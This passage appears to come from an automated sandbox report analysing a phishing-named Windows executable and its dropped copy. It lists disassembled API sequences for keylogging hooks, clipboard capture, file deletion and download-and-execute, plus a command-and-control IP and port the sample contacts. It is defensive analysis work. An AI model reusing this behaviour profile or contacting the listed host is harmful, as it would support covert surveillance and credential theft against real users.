$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$alloca
tor@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs13_2_00402C45
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_str
ing@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,13_2_0040BC9B
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$ch
ar_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all13_2_00403183
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose,13_2_0040F234
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_00405AFB
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c13_2_0040A71E
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_004057B6
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?13_2_0040BEA2
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 4x nop then jmp 023C4FB8h0_2_023C52C5
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 4x nop then jmp 048A4280h9_2_048A458D

            Networking

            Source: Malware configuration extractorURLs: 62.102.148.166
            Source: global trafficTCP traffic: 192.168.2.9:49707 -> 62.102.148.166:3319
            Source: Joe Sandbox ViewIP Address: 62.102.148.166 62.102.148.166
            Source: Joe Sandbox ViewASN Name: TEKNIKBYRANSE TEKNIKBYRANSE
            Source: unknownTCP traffic detected without corresponding DNS query: 62.102.148.166 (39 identical entries)
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040221C ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_0040221C
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Esc] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Enter] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Tab] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Down] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Right] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Up] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Left] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [End] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [F2] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [F1] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Del] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: [Del] 13_2_004043BF
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00403877 SetWindowsHookExA 0000000D,0040385C,0000000013_2_00403877
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004050FC OpenClipboard,GetClipboardData,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,13_2_004050FC
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_st